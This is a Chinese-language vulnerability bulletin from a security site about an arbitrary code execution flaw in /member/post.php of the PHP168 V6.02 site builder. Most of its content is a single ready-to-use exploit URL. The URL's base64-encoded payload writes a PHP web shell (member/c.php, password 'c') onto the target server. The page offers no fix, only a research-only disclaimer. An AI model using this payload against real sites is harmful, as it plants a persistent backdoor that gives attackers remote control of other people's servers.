中文(Chinese) 英文(English) Tel: 4006-858-981           Msn: China@Safe.sh         QQ: 7387526       Server Hosting        加入收藏
主页 >> 安全风向标 >> 漏洞播报
安全风向标
分类
PHP168 V6.02 文件/member/post.php执行任意代码漏洞
影响版本:
PHP168 V6.02

漏洞描述:
PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用。

PHP168在某数组没有初试化,导致可以提交任意代码执行。

测试方法:
[www.safe.sh]
本站提供程序(方法)可能带有攻击性,
仅供安全研究与教学之用,风险自负!

/member/post.php?only=1&showHtml_Type[bencandy][1]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}&aid=1&job=endHTML

直接在该目录生成个member/c.php 密码为c

Safe.sh安全建议:
暂无
等待官方补丁
页面工具 打印 | 电子邮件 | 评价
关于我们 | | 沪ICP备12021423号-1 | 联系我们 友情链接 | 站点地图 | 隐私 | 法律 | Copyright © 2018 Safe.Sh